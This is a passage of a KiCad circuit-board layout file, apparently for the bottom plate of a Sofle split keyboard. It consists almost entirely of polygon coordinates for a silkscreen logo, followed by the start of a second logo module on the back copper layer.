0.145415 4.360334) (xy 0.326238 4.360334) (xy 0.310998 4.15925) (xy 0.278305 3.732079) (xy 0.247124 3.332718) (xy 0.218229 2.970625) (xy 0.192394 2.655259) (xy 0.170396 2.396076) (xy 0.153008 2.202534) (xy 0.141113 2.085031) (xy 0.119328 1.897047) (xy 0.385396 1.897047) (xy 0.388255 1.977137) (xy 0.394971 2.021417) (xy 0.405475 2.110644) (xy 0.420643 2.269151) (xy 0.439167 2.481765) (xy 0.459737 2.733308) (xy 0.481047 3.008607) (xy 0.487149 3.090334) (xy 0.514144 3.4515) (xy 0.5364 3.73704) (xy 0.555092 3.955787) (xy 0.571398 4.116576) (xy 0.586493 4.22824) (xy 0.601554 4.299612) (xy 0.617756 4.339525) (xy 0.636277 4.356815) (xy 0.656262 4.360334) (xy 0.726564 4.334475) (xy 0.739899 4.319512) (xy 0.744635 4.268186) (xy 0.745543 4.143365) (xy 0.742862 3.956123) (xy 0.736828 3.717534) (xy 0.727681 3.43867) (xy 0.715656 3.130607) (xy 0.713108 3.070679) (xy 0.661088 1.862667) (xy 0.515633 1.862667) (xy 0.421586 1.867138) (xy 0.385396 1.897047) (xy 0.119328 1.897047) (xy 0.11537 1.862895) (xy -0.482065 1.884248) (xy -1.086633 1.905061) (xy -1.659464 1.923216) (xy -2.195309 1.938625) (xy -2.688919 1.9512) (xy -3.135046 1.960855) (xy -3.528439 1.9675) (xy -3.863849 1.971049) (xy -4.136027 1.971414) (xy -4.339723 1.968507) (xy -4.469689 1.96224) (xy -4.520675 1.952526) (xy -4.521148 1.951724) (xy -4.571096 1.909343) (xy -4.59846 1.905) (xy -4.629961 1.890493) (xy -4.644733 1.836248) (xy -4.644748 1.778) (xy -4.357923 1.778) (xy -4.318577 1.783197) (xy -4.207479 1.785163) (xy -4.037479 1.783996) (xy -3.821425 1.779794) (xy -3.572167 1.772657) (xy -3.545468 1.771771) (xy -3.347113 1.765645) (xy -3.075225 1.758062) (xy -2.740919 1.749295) (xy -2.355311 1.739615) (xy -1.929519 1.729294) (xy -1.474656 1.718603) (xy -1.00184 1.707813) (xy -0.522185 1.697197) (xy -0.275167 1.691865) (xy 0.826165 1.673003) (xy 1.940579 1.662939) (xy 3.051864 1.661567) (xy 4.143807 1.668778) (xy 5.200194 1.684465) (xy 6.204813 1.708521) (xy 7.14145 1.740838) (xy 7.145812 1.741016) (xy 7.449987 1.752546) (xy 7.725841 1.761406) (xy 7.962255 1.76737) (xy 8.148113 1.770208) (xy 8.272297 1.769691) (xy 8.323691 1.765592) (xy 8.32422 1.765224) (xy 8.305805 1.726718) (xy 8.244129 1.625336) (xy 8.143774 1.468059) (xy 8.00932 1.261864) (xy 7.845349 1.013731) (xy 7.656443 0.730639) (xy 7.447183 0.419566) (xy 7.240945 0.115134) (xy 6.134907 -1.512194) (xy 5.53337 -1.581878) (xy 5.160918 -1.6241) (xy 4.830525 -1.658978) (xy 4.528208 -1.6872) (xy 4.239986 -1.709455) (xy 3.951877 -1.726429) (xy 3.649899 -1.73881) (xy 3.32007 -1.747287) (xy 2.948408 -1.752546) (xy 2.520932 -1.755277) (xy 2.023659 -1.756165) (xy 1.989667 -1.756175) (xy 1.395995 -1.754602) (xy 0.871361 -1.749062) (xy 0.400192 -1.738761) (xy -0.033082 -1.722906) (xy -0.44403 -1.700704) (xy -0.848225 -1.671362) (xy -1.261236 -1.634086) (xy -1.698634 -1.588084) (xy -2.008876 -1.552481) (xy -2.430252 -1.502833) (xy -3.39283 0.127) (xy -3.592029 0.464649) (xy -3.777414 0.779591) (xy -3.94465 1.064407) (xy -4.089399 1.31168) (xy -4.207325 1.513991) (xy -4.294092 1.663922) (xy -4.345364 1.754055) (xy -4.357923 1.778) (xy -4.644748 1.778) (xy -4.644762 1.726179) (xy -4.636363 1.598084) (xy -4.628401 1.470037) (xy -4.618548 1.271763) (xy -4.607322 1.017668) (xy -4.595241 0.722157) (xy -4.582824 0.399637) (xy -4.570587 0.064512) (xy -4.55905 -0.268812) (xy -4.548731 -0.585929) (xy -4.540147 -0.872433) (xy -4.533816 -1.11392) (xy -4.530257 -1.295983) (xy -4.529667 -1.368829) (xy -4.529667 -1.619574) (xy -4.751917 -1.591317) (xy -4.946659 -1.565147) (xy -5.181219 -1.531398) (xy -5.442634 -1.492169) (xy -5.717941 -1.449561) (xy -5.994178 -1.405673) (xy -6.258382 -1.362605) (xy -6.497592 -1.322458) (xy -6.698844 -1.287331) (xy -6.849176 -1.259325) (xy -6.935626 -1.24054) (xy -6.95113 -1.235022) (xy -6.960547 -1.179975) (xy -6.949666 -1.074505) (xy -6.939274 -1.02187) (xy -6.919068 -0.892964) (xy -6.936187 -0.805931) (xy -7.003282 -0.747652) (xy -7.133005 -0.705006) (xy -7.272179 -0.676635) (xy -7.687722 -0.57906) (xy -8.141373 -0.434252) (xy -8.607652 -0.250876) (xy -8.862062 -0.135864) (xy -9.067553 -0.039318) (xy -9.211958 0.024413) (xy -9.310293 0.05962) (xy -9.377575 0.070595) (xy -9.42882 0.061628) (xy -9.474983 0.039303) (xy -9.564082 -0.048349) (xy -9.650262 -0.210714) (xy -9.734075 -0.449702) (xy -9.816072 -0.767225) (xy -9.896806 -1.165192) (xy -9.976827 -1.645514) (xy -9.993565 -1.756833) (xy -10.046107 -2.172447) (xy -10.069729 -2.519885) (xy -10.069602 -2.527125) (xy -9.811989 -2.527125) (xy -9.796235 -2.291758) (xy -9.767121 -2.018342) (xy -9.72726 -1.722387) (xy -9.679268 -1.419401) (xy -9.62576 -1.124891) (xy -9.569351 -0.854365) (xy -9.512656 -0.623332) (xy -9.458291 -0.4473) (xy -9.413855 -0.34925) (xy -9.346552 -0.277521) (xy -9.28969 -0.254) (xy -9.226121 -0.271461) (xy -9.106179 -0.318517) (xy -8.949356 -0.387173) (xy -8.835582 -0.440215) (xy -8.398813 -0.626712) (xy -7.944478 -0.781125) (xy -7.509906 -0.890937) (xy -7.464798 -0.899778) (xy -7.190191 -0.95187) (xy -7.21705 -1.079185) (xy -7.313871 -1.59863) (xy -7.316804 -1.620706) (xy -7.065777 -1.620706) (xy -7.030224 -1.554957) (xy -6.972725 -1.524) (xy -6.915526 -1.530414) (xy -6.787781 -1.548356) (xy -6.602533 -1.575875) (xy -6.372823 -1.611022) (xy -6.111693 -1.651845) (xy -6.008313 -1.668222) (xy -5.720392 -1.713273) (xy -5.441737 -1.755554) (xy -5.189949 -1.792493) (xy -4.982631 -1.821519) (xy -4.837384 -1.840061) (xy -4.815417 -1.842487) (xy -4.529667 -1.87253) (xy -4.529667 -2.015765) (xy -4.543796 -2.118889) (xy -4.581533 -2.158154) (xy -4.582583 -2.158158) (xy -4.645215 -2.150056) (xy -4.775481 -2.128169) (xy -4.960739 -2.094947) (xy -5.188344 -2.05284) (xy -5.445653 -2.004298) (xy -5.720022 -1.951774) (xy -5.998807 -1.897717) (xy -6.269364 -1.844578) (xy -6.51905 -1.794807) (xy -6.735221 -1.750856) (xy -6.905232 -1.715175) (xy -7.01644 -1.690214) (xy -7.056025 -1.678753) (xy -7.065777 -1.620706) (xy -7.316804 -1.620706) (xy -7.377385 -2.076598) (xy -7.394473 -2.276226) (xy -7.408096 -2.459387) (xy -7.421695 -2.572825) (xy -7.43994 -2.631352) (xy -7.467504 -2.649782) (xy -7.509058 -2.642926) (xy -7.510022 -2.642645) (xy -7.662299 -2.576681) (xy -7.85469 -2.460623) (xy -8.069627 -2.306351) (xy -8.289539 -2.125748) (xy -8.33762 -2.082958) (xy -8.504354 -1.939915) (xy -8.624248 -1.860753) (xy -8.706902 -1.846239) (xy -8.761914 -1.897138) (xy -8.798881 -2.014219) (xy -8.817076 -2.121265) (xy -8.849541 -2.315023) (xy -8.894645 -2.542322) (xy -8.947626 -2.783133) (xy -9.003723 -3.01743) (xy -9.058173 -3.225184) (xy -9.106215 -3.386369) (xy -9.137941 -3.470715) (xy -9.221748 -3.590383) (xy -9.318841 -3.635271) (xy -9.422576 -3.612887) (xy -9.526313 -3.53074) (xy -9.623411 -3.396339) (xy -9.707227 -3.217192) (xy -9.77112 -3.000807) (xy -9.808448 -2.754693) (xy -9.811766 -2.708937) (xy -9.811989 -2.527125) (xy -10.069602 -2.527125) (xy -10.064594 -2.810484) (xy -10.030869 -3.055581) (xy -10.01348 -3.128462) (xy -9.922308 -3.380513) (xy -9.796702 -3.599979) (xy -9.647633 -3.774247) (xy -9.486069 -3.890704) (xy -9.322979 -3.936737) (xy -9.310321 -3.937) (xy -9.169436 -3.906753) (xy -9.044904 -3.813134) (xy -8.934378 -3.651821) (xy -8.835506 -3.418497) (xy -8.745941 -3.108839) (xy -8.671577 -2.762524) (xy -8.63405 -2.568218) (xy -8.601672 -2.406691) (xy -8.57789 -2.29474) (xy -8.566155 -2.24916) (xy -8.566137 -2.249134) (xy -8.532008 -2.267665) (xy -8.45127 -2.330871) (xy -8.339716 -2.426209) (xy -8.309857 -2.452705) (xy -8.086143 -2.626311) (xy -7.836941 -2.776567) (xy -7.589846 -2.888589) (xy -7.401395 -2.942755) (xy -7.310956 -2.952217) (xy -7.246706 -2.933817) (xy -7.203017 -2.87575) (xy -7.174263 -2.766209) (xy -7.154818 -2.59339) (xy -7.142006 -2.398521) (xy -7.130663 -2.220798) (xy -7.119224 -2.07828) (xy -7.109324 -1.989692) (xy -7.104577 -1.96997) (xy -7.061152 -1.974471) (xy -6.944721 -1.992891) (xy -6.765475 -2.023448) (xy -6.533605 -2.064358) (xy -6.259305 -2.113836) (xy -5.952764 -2.170098) (xy -5.812597 -2.196115) (xy -5.449245 -2.264254) (xy -5.160638 -2.319771) (xy -4.938152 -2.364804) (xy -4.773161 -2.401493) (xy -4.65704 -2.431976) (xy -4.581165 -2.458393) (xy -4.53691 -2.482882) (xy -4.515652 -2.507584) (xy -4.511425 -2.518833) (xy -4.50187 -2.599972) (xy -4.494899 -2.757474) (xy -4.490378 -2.983083) (xy -4.488175 -3.26854) (xy -4.488157 -3.605586) (xy -4.490191 -3.985962) (xy -4.494145 -4.401411) (xy -4.499884 -4.843674) (xy -4.507278 -5.304491) (xy -4.516192 -5.775605) (xy -4.526494 -6.248758) (xy -4.538051 -6.71569) (xy -4.55073 -7.168144) (xy -4.564399 -7.59786) (xy -4.578924 -7.996581) (xy -4.594174 -8.356047) (xy -4.610014 -8.668001) (xy -4.61045 -8.675719) (xy -4.624599 -8.933124) (xy -4.628358 -9.120597) (xy -4.625499 -9.147442) (xy -4.44036 -9.147442) (xy -4.436116 -9.011076) (xy -4.426797 -8.85825) (xy -4.402817 -8.434556) (xy -4.381859 -7.939898) (xy -4.363928 -7.384177) (xy -4.349025 -6.777295) (xy -4.337153 -6.129155) (xy -4.328313 -5.449658) (xy -4.322509 -4.748706) (xy -4.319742 -4.036202) (xy -4.320015 -3.322047) (xy -4.32333 -2.616145) (xy -4.329689 -1.928395) (xy -4.339095 -1.268702) (xy -4.351549 -0.646966) (xy -4.367055 -0.07309) (xy -4.385615 0.443024) (xy -4.40723 0.891474) (xy -4.424472 1.163901) (xy -4.432411 1.330169) (xy -4.428651 1.433103) (xy -4.413657 1.463218) (xy -4.409858 1.460235) (xy -4.380628 1.415644) (xy -4.313394 1.305901) (xy -4.212889 1.138946) (xy -4.083844 0.922716) (xy -3.930989 0.665151) (xy -3.759057 0.374189) (xy -3.57278 0.057768) (xy -3.493607 -0.077057) (xy -3.301937 -0.405424) (xy -3.122936 -0.715423) (xy -2.961396 -0.998506) (xy -2.822107 -1.246129) (xy -2.709863 -1.449744) (xy -2.629455 -1.600806) (xy -2.585676 -1.690769) (xy -2.579712 -1.70689) (xy -2.571568 -1.747932) (xy -2.368913 -1.747932) (xy -2.357737 -1.704136) (xy -2.315153 -1.704748) (xy -2.302764 -1.708355) (xy -2.238337 -1.719291) (xy -2.102995 -1.73609) (xy -1.910174 -1.757299) (xy -1.673308 -1.781466) (xy -1.405834 -1.807139) (xy -1.291167 -1.817696) (xy -0.370498 -1.893393) (xy 0.485377 -1.946438) (xy 1.293115 -1.97728) (xy 2.069378 -1.986367) (xy 2.830824 -1.974148) (xy 3.4925 -1.946627) (xy 3.853319 -1.925112) (xy 4.237152 -1.898008) (xy 4.625621 -1.866939) (xy 5.000351 -1.833531) (xy 5.342965 -1.799411) (xy 5.635084 -1.766203) (xy 5.830857 -1.739772) (xy 5.957402 -1.723528) (xy 6.044207 -1.717741) (xy 6.066893 -1.720671) (xy 6.067865 -1.765977) (xy 6.058993 -1.876598) (xy 6.041978 -2.03397) (xy 6.027055 -2.154892) (xy 5.964373 -2.688505) (xy 5.914471 -3.224834) (xy 5.876519 -3.779365) (xy 5.849684 -4.367587) (xy 5.833134 -5.004987) (xy 5.827043 -5.607781) (xy 6.015822 -5.607781) (xy 6.036675 -4.641466) (xy 6.082204 -3.699884) (xy 6.152268 -2.802514) (xy 6.235618 -2.053142) (xy 6.290398 -1.629833) (xy 7.362979 -0.051475) (xy 7.584021 0.273049) (xy 7.790316 0.574474) (xy 7.977062 0.845887) (xy 8.139453 1.080373) (xy 8.272685 1.271017) (xy 8.371955 1.410904) (xy 8.432459 1.49312) (xy 8.449729 1.512715) (xy 8.451921 1.468634) (xy 8.451883 1.349485) (xy 8.449776 1.164832) (xy 8.445758 0.92424) (xy 8.439988 0.637273) (xy 8.432625 0.313498) (xy 8.4242 -0.02331) (xy 8.413548 -0.500035) (xy 8.405031 -1.024539) (xy 8.398588 -1.588436) (xy 8.394157 -2.183337) (xy 8.391679 -2.800857) (xy 8.391091 -3.432608) (xy 8.392333 -4.070202) (xy 8.395345 -4.705252) (xy 8.400065 -5.329372) (xy 8.403391 -5.645402) (xy 8.593667 -5.645402) (xy 8.596607 -5.52723) (xy 8.614439 -5.473685) (xy 8.660681 -5.464737) (xy 8.710083 -5.472906) (xy 8.781766 -5.484343) (xy 8.925239 -5.505259) (xy 9.128368 -5.533958) (xy 9.181878 -5.541384) (xy 11.641196 -5.541384) (xy 11.66495 -5.505978) (xy 11.736299 -5.454498) (xy 11.840937 -5.396548) (xy 11.942773 -5.350519) (xy 12.0015 -5.334478) (xy 11.994749 -5.353634) (xy 11.930602 -5.40255) (xy 11.8745 -5.438729) (xy 11.757375 -5.505044) (xy 11.675324 -5.540637) (xy 11.641196 -5.541384) (xy 9.181878 -5.541384) (xy 9.365261 -5.566833) (xy 11.557 -5.566833) (xy 11.578167 -5.545666) (xy 11.599333 -5.566833) (xy 11.578167 -5.588) (xy 11.557 -5.566833) (xy 9.365261 -5.566833) (xy 9.379018 -5.568742) (xy 9.665053 -5.607915) (xy 9.974339 -5.64978) (xy 9.990667 -5.651976) (xy 10.355446 -5.702078) (xy 10.64389 -5.744256) (xy 10.863808 -5.779958) (xy 11.02301 -5.810636) (xy 11.129307 -5.837738) (xy 11.190509 -5.862714) (xy 11.209575 -5.878196) (xy 11.28446 -5.921945) (xy 11.578167 -5.921945) (xy 11.581418 -5.912911) (xy 11.654495 -5.889296) (xy 11.784557 -5.854814) (xy 11.937242 -5.818129) (xy 12.123091 -5.774429) (xy 12.279272 -5.736367) (xy 12.386675 -5.70868) (xy 12.424076 -5.697428) (xy 12.494229 -5.681094) (xy 12.576041 -5.676597) (xy 12.636326 -5.683664) (xy 12.645198 -5.699246) (xy 12.594504 -5.718368) (xy 12.480367 -5.748285) (xy 12.322683 -5.784843) (xy 12.141345 -5.82389) (xy 11.956249 -5.861275) (xy 11.787289 -5.892844) (xy 11.654359 -5.914447) (xy 11.578167 -5.921945) (xy 11.28446 -5.921945) (xy 11.298053 -5.929886) (xy 11.374258 -5.933443) (xy 11.45216 -5.933381) (xy 11.468468 -5.973234) (xy 11.462635 -6.001513) (xy 11.449918 -6.084859) (xy 11.469916 -6.143624) (xy 11.533672 -6.182223) (xy 11.652227 -6.205067) (xy 11.836626 -6.21657) (xy 12.009894 -6.220226) (xy 12.2052 -6.223824) (xy 12.366779 -6.228881) (xy 12.477452 -6.234716) (xy 12.519892 -6.240448) (xy 12.485305 -6.247464) (xy 12.380813 -6.257249) (xy 12.221089 -6.268677) (xy 12.020806 -6.280621) (xy 11.942626 -6.284778) (xy 11.691631 -6.299861) (xy 11.514929 -6.316079) (xy 11.402146 -6.334955) (xy 11.34291 -6.358013) (xy 11.328572 -6.374951) (xy 11.316933 -6.461621) (xy 11.366167 -6.521401) (xy 11.484878 -6.560462) (xy 11.612458 -6.578631) (xy 11.797261 -6.601728) (xy 12.003052 -6.633604) (xy 12.213991 -6.671009) (xy 12.414237 -6.710698) (xy 12.587948 -6.749421) (xy 12.719284 -6.783932) (xy 12.792403 -6.810984) (xy 12.801656 -6.822425) (xy 12.734837 -6.855022) (xy 12.597878 -6.861752) (xy 12.400858 -6.843828) (xy 12.153858 -6.802461) (xy 11.866956 -6.738867) (xy 11.659298 -6.684939) (xy 11.437489 -6.622426) (xy 11.243051 -6.564386) (xy 11.091451 -6.515687) (xy 10.998152 -6.481196) (xy 10.977749 -6.47044) (xy 10.913257 -6.462259) (xy 10.840166 -6.516501) (xy 10.767432 -6.605511) (xy 10.763288 -6.67177) (xy 10.813846 -6.729074) (xy 10.873304 -6.813652) (xy 10.930434 -6.9512) (xy 10.975563 -7.110339) (xy 10.999015 -7.259692) (xy 10.998897 -7.329219) (xy 10.977682 -7.44219) (xy 10.943495 -7.475952) (xy 10.895555 -7.429601) (xy 10.83308 -7.302233) (xy 10.755289 -7.092945) (xy 10.730437 -7.018875) (xy 10.660526 -6.816082) (xy 10.590976 -6.630397) (xy 10.53043 -6.484023) (xy 10.491799 -6.40592) (xy 10.418677 -6.313778) (xy 10.313116 -6.235631) (xy 10.164321 -6.167308) (xy 9.961497 -6.104642) (xy 9.693851 -6.043462) (xy 9.419167 -5.991608) (xy 9.190158 -5.950865) (xy 8.984683 -5.914017) (xy 8.820047 -5.884188) (xy 8.713555 -5.864505) (xy 8.688917 -5.859729) (xy 8.629667 -5.835891) (xy 8.601555 -5.779986) (xy 8.593754 -5.667655) (xy 8.593667 -5.645402) (xy 8.403391 -5.645402) (xy 8.406432 -5.934173) (xy 8.414385 -6.51127) (xy 8.423864 -7.052273) (xy 8.434808 -7.548797) (xy 8.447156 -7.992454) (xy 8.460846 -8.374857) (xy 8.475818 -8.687618) (xy 8.48852 -8.880046) (xy 8.497709 -9.051406) (xy 8.491331 -9.153284) (xy 8.468069 -9.199654) (xy 8.457906 -9.204737) (xy 8.395325 -9.222684) (xy 8.271751 -9.256941) (xy 8.107939 -9.301782) (xy 8.001 -9.330833) (xy 7.721023 -9.422747) (xy 7.383587 -9.561372) (xy 6.99886 -9.742476) (xy 6.932083 -9.775874) (xy 6.717194 -9.883581) (xy 6.531103 -9.975683) (xy 6.385833 -10.046327) (xy 6.293407 -10.089657) (xy 6.265333 -10.100532) (xy 6.260941 -10.056879) (xy 6.248739 -9.942607) (xy 6.230194 -9.771256) (xy 6.206769 -9.556363) (xy 6.182054 -9.3308) (xy 6.102763 -8.460339) (xy 6.048723 -7.536697) (xy 6.019791 -6.579351) (xy 6.015822 -5.607781) (xy 5.827043 -5.607781) (xy 5.826039 -5.707052) (xy 5.825638 -5.9055) (xy 5.826914 -6.314834) (xy 5.830944 -6.720754) (xy 5.837402 -7.108929) (xy 5.845964 -7.465026) (xy 5.856302 -7.774712) (xy 5.868093 -8.023657) (xy 5.876628 -8.149166) (xy 5.903637 -8.467137) (xy 5.932847 -8.788565) (xy 5.962944 -9.100957) (xy 5.992613 -9.391824) (xy 6.02054 -9.648673) (xy 6.045409 -9.859014) (xy 6.065906 -10.010354) (xy 6.080716 -10.090204) (xy 6.081073 -10.091413) (xy 6.087699 -10.138712) (xy 6.05622 -10.156352) (xy 5.967823 -10.15003) (xy 5.9133 -10.142216) (xy 5.635503 -10.102841) (xy 5.333962 -10.063926) (xy 5.032747 -10.028262) (xy 4.755929 -9.99864) (xy 4.527578 -9.977849) (xy 4.445 -9.971992) (xy 3.969171 -9.943348) (xy 3.565418 -9.920096) (xy 3.221357 -9.901721) (xy 2.924603 -9.887711) (xy 2.662771 -9.877551) (xy 2.423476 -9.870729) (xy 2.194336 -9.866729) (xy 1.962963 -9.86504) (xy 1.862667 -9.864896) (xy 1.140671 -9.875011) (xy 0.388888 -9.904197) (xy -0.365214 -9.950718) (xy -1.094166 -10.012836) (xy -1.770498 -10.088814) (xy -1.856994 -10.100134) (xy -2.048431 -10.124269) (xy -2.206476 -10.141565) (xy -2.313873 -10.150311) (xy -2.353127 -10.149317) (xy -2.353369 -10.104375) (xy -2.344245 -9.99014) (xy -2.327193 -9.821294) (xy -2.303645 -9.61252) (xy -2.287761 -9.480422) (xy -2.23449 -9.024339) (xy -2.191469 -8.600257) (xy -2.157782 -8.190967) (xy -2.132509 -7.779259) (xy -2.114733 -7.347925) (xy -2.103536 -6.879754) (xy -2.097999 -6.357536) (xy -2.097016 -5.9055) (xy -2.106185 -5.005315) (xy -2.132893 -4.179572) (xy -2.177681 -3.419766) (xy -2.241092 -2.717395) (xy -2.32367 -2.063956) (xy -2.355582 -1.855339) (xy -2.368913 -1.747932) (xy -2.571568 -1.747932) (xy -2.558387 -1.814351) (xy -2.531976 -1.992676) (xy -2.50192 -2.228318) (xy -2.46966 -2.507726) (xy -2.436636 -2.817351) (xy -2.404292 -3.143644) (xy -2.374067 -3.473056) (xy -2.347404 -3.792036) (xy -2.325744 -4.087036) (xy -2.324459 -4.106333) (xy -2.310269 -4.392091) (xy -2.300398 -4.743077) (xy -2.29465 -5.145114) (xy -2.292833 -5.584027) (xy -2.294752 -6.045637) (xy -2.300212 -6.515768) (xy -2.309021 -6.980243) (xy -2.320982 -7.424885) (xy -2.335903 -7.835518) (xy -2.353589 -8.197965) (xy -2.373846 -8.498049) (xy -2.386494 -8.636) (xy -2.431407 -9.05596) (xy -2.470154 -9.396363) (xy -2.503425 -9.662041) (xy -2.531909 -9.857827) (xy -2.556295 -9.988552) (xy -2.577272 -10.059048) (xy -2.591798 -10.075333) (xy -2.641615 -10.055754) (xy -2.749356 -10.002393) (xy -2.89934 -9.923316) (xy -3.07589 -9.826589) (xy -3.082428 -9.822943) (xy -3.291755 -9.712024) (xy -3.520875 -9.600332) (xy -3.753523 -9.494763) (xy -3.973432 -9.402211) (xy -4.164337 -9.329571) (xy -4.309971 -9.283741) (xy -4.384471 -9.271) (xy -4.416085 -9.262304) (xy -4.434199 -9.226151) (xy -4.44036 -9.147442) (xy -4.625499 -9.147442) (xy -4.614275 -9.25282) (xy -4.574898 -9.344477) (xy -4.502778 -9.410251) (xy -4.390462 -9.464824) (xy -4.230498 -9.52288) (xy -4.169833 -9.543963) (xy -3.852189 -9.668705) (xy -3.497793 -9.831487) (xy -3.136322 -10.017855) (xy -2.804871 -10.208802) (xy -2.518833 -10.384043) (xy -2.010833 -10.314586) (xy -1.639783 -10.265075) (xy -1.305058 -10.223663) (xy -0.993912 -10.189638) (xy -0.693597 -10.16229) (xy -0.391369 -10.140908) (xy -0.074481 -10.124781) (xy 0.269814 -10.113198) (xy 0.654262 -10.105449) (xy 1.09161 -10.100822) (xy 1.594603 -10.098608) (xy 1.869722 -10.098187) (xy 2.270961 -10.098504) (xy 2.646207 -10.100074) (xy 2.986984 -10.102769) (xy 3.284818 -10.106463) (xy 3.531234 -10.11103) (xy 3.717757 -10.116343) (xy 3.835912 -10.122274) (xy 3.876968 -10.12819) (xy 3.893674 -10.180698) (xy 3.905059 -10.239802) (xy 4.191 -10.239802) (xy 4.202466 -10.186684) (xy 4.251783 -10.165669) (xy 4.36133 -10.167683) (xy 4.367748 -10.168149) (xy 4.544495 -10.181166) (xy 4.667124 -10.8585) (xy 4.73041 -11.192753) (xy 4.789657 -11.454532) (xy 4.852249 -11.655257) (xy 4.925564 -11.806347) (xy 5.016984 -11.919221) (xy 5.13389 -12.005299) (xy 5.283664 -12.076001) (xy 5.473685 -12.142745) (xy 5.503333 -12.152237) (xy 5.743347 -12.229277) (xy 5.913156 -12.286741) (xy 6.023469 -12.329985) (xy 6.084993 -12.364366) (xy 6.108436 -12.395241) (xy 6.104506 -12.427967) (xy 6.094847 -12.448154) (xy 6.043054 -12.502618) (xy 5.954513 -12.509195) (xy 5.915249 -12.503056) (xy 5.784978 -12.468991) (xy 5.638578 -12.416116) (xy 5.502737 -12.355867) (xy 5.404147 -12.299681) (xy 5.372516 -12.27049) (xy 5.315301 -12.244879) (xy 5.233165 -12.263957) (xy 5.163971 -12.315608) (xy 5.148598 -12.342146) (xy 5.145325 -12.425156) (xy 5.168964 -12.520451) (xy 5.247543 -12.750984) (xy 5.323816 -13.018168) (xy 5.392651 -13.299145) (xy 5.448916 -13.571058) (xy 5.487481 -13.81105) (xy 5.503213 -13.996263) (xy 5.503333 -14.009803) (xy 5.49898 -14.158816) (xy 5.487276 -14.256629) (xy 5.470253 -14.287864) (xy 5.466919 -14.285383) (xy 5.438653 -14.219975) (xy 5.404101 -14.089221) (xy 5.3667 -13.911879) (xy 5.329888 -13.706711) (xy 5.297101 -13.492476) (xy 5.271777 -13.287934) (xy 5.260013 -13.156037) (xy 5.239043 -12.963816) (xy 5.203903 -12.84617) (xy 5.147904 -12.79334) (xy 5.064357 -12.795566) (xy 5.022464 -12.809402) (xy 4.995699 -12.82972) (xy 4.976362 -12.875182) (xy 4.963088 -12.958164) (xy 4.954515 -13.09104) (xy 4.949277 -13.286185) (xy 4.946545 -13.498279) (xy 4.94349 -13.737367) (xy 4.939473 -13.896806) (xy 4.934009 -13.981612) (xy 4.926613 -13.996804) (xy 4.916802 -13.947397) (xy 4.909159 -13.885333) (xy 4.892396 -13.695148) (xy 4.879333 -13.471887) (xy 4.873281 -13.284936) (xy 4.868398 -13.118262) (xy 4.856643 -13.017218) (xy 4.832966 -12.962787) (xy 4.792316 -12.93595) (xy 4.779405 -12.931481) (xy 4.692847 -12.92407) (xy 4.652838 -12.940895) (xy 4.63087 -12.994532) (xy 4.597449 -13.114601) (xy 4.556803 -13.28433) (xy 4.513161 -13.486949) (xy 4.504999 -13.527183) (xy 4.461188 -13.734388) (xy 4.41949 -13.912126) (xy 4.384163 -14.043524) (xy 4.359463 -14.111711) (xy 4.356399 -14.11605) (xy 4.33155 -14.133541) (xy 4.321576 -14.113188) (xy 4.327833 -14.045778) (xy 4.351673 -13.922097) (xy 4.394453 -13.732931) (xy 4.442168 -13.532633) (xy 4.509 -13.253837) (xy 4.556948 -13.046208) (xy 4.587202 -12.898659) (xy 4.600952 -12.800104) (xy 4.599385 -12.739457) (xy 4.583692 -12.705632) (xy 4.555061 -12.687541) (xy 4.533608 -12.680084) (xy 4.475115 -12.643939) (xy 4.449385 -12.568351) (xy 4.445 -12.473741) (xy 4.439631 -12.380908) (xy 4.424585 -12.218715) (xy 4.401449 -12.001717) (xy 4.371812 -11.74447) (xy 4.337261 -11.461527) (xy 4.318 -11.309997) (xy 4.281902 -11.026368) (xy 4.249792 -10.767367) (xy 4.22321 -10.545956) (xy 4.203694 -10.375097) (xy 4.192781 -10.267754) (xy 4.191 -10.239802) (xy 3.905059 -10.239802) (xy 3.917448 -10.304114) (xy 3.946624 -10.485132) (xy 3.979536 -10.710446) (xy 4.014519 -10.96675) (xy 4.049908 -11.240737) (xy 4.084036 -11.5191) (xy 4.115238 -11.788534) (xy 4.141848 -12.035731) (xy 4.162202 -12.247387) (xy 4.174633 -12.410193) (xy 4.177476 -12.510843) (xy 4.176701 -12.522811) (xy 4.1136 -12.736614) (xy 4.032383 -12.862332) (xy 3.929813 -13.005476) (xy 3.833032 -13.164385) (xy 3.813945 -13.200267) (xy 3.760459 -13.335936) (xy 3.720627 -13.487313) (xy 3.990535 -13.487313) (xy 3.997032 -13.442752) (xy 4.033427 -13.354) (xy 4.08614 -13.249517) (xy 4.141594 -13.157761) (xy 4.159141 -13.133916) (xy 4.208039 -13.082014) (xy 4.215571 -13.098285) (xy 4.182876 -13.17768) (xy 4.123299 -13.292879) (xy 4.058505 -13.4041) (xy 4.009502 -13.473876) (xy 3.990535 -13.487313) (xy 3.720627 -13.487313) (xy 3.71636 -13.503528) (xy 3.68527 -13.678951) (xy 3.670811 -13.838111) (xy 3.676604 -13.956915) (xy 3.693466 -14.00175) (xy 3.779213 -14.052247) (xy 3.883757 -14.032944) (xy 3.986723 -13.949103) (xy 4.008654 -13.920367) (xy 4.101474 -13.787531) (xy 4.09332 -14.119576) (xy 4.09077 -14.28689) (xy 4.09705 -14.390681) (xy 4.117875 -14.452039) (xy 4.158961 -14.492049) (xy 4.201218 -14.517727) (xy 4.305523 -14.555635) (xy 4.397992 -14.532976) (xy 4.494339 -14.442492) (xy 4.561417 -14.351351) (xy 4.656667 -14.211479) (xy 4.656667 -14.360723) (xy 4.684042 -14.501218) (xy 4.75543 -14.580473) (xy 4.854723 -14.596864) (xy 4.965814 -14.548766) (xy 5.072596 -14.434555) (xy 5.091467 -14.404571) (xy 5.183133 -14.24921) (xy 5.247983 -14.468126) (xy 5.293299 -14.600594) (xy 5.338753 -14.701521) (xy 5.361205 -14.73461) (xy 5.436651 -14.759758) (xy 5.525076 -14.710217)) (layer F.SilkS) (width 0.01)) ) (module SofleKeyboardBottomPlate:SofleLogo1 (layer B.Cu) (tedit 0) (tstamp 5DA51B8A) (at 40.58 39.02 180) (fp_text reference Ref** (at 0 0) (layer B.SilkS) hide (effects (font (size 1.27 1.27) (thickness 0.15)) (justify mirror)) ) (fp_text value Val** (at 0 0) (layer B.SilkS) hide (effects (font (size 1.27 1.27) (thickness 0.15)) (justify mirror)) ) (fp_poly (pts (xy -9.658223 9.306152) (xy -9.61737 9.270353) (xy -9.609667 9.18959) (xy -9.609667 9.065846) (xy -9.485923 9.18959) (xy -9.341329 9.291276) (xy -9.231923 9.313333) (xy -9.143329 9.304903) (xy -9.107861 9.262202) (xy -9.101667 9.170577) (xy 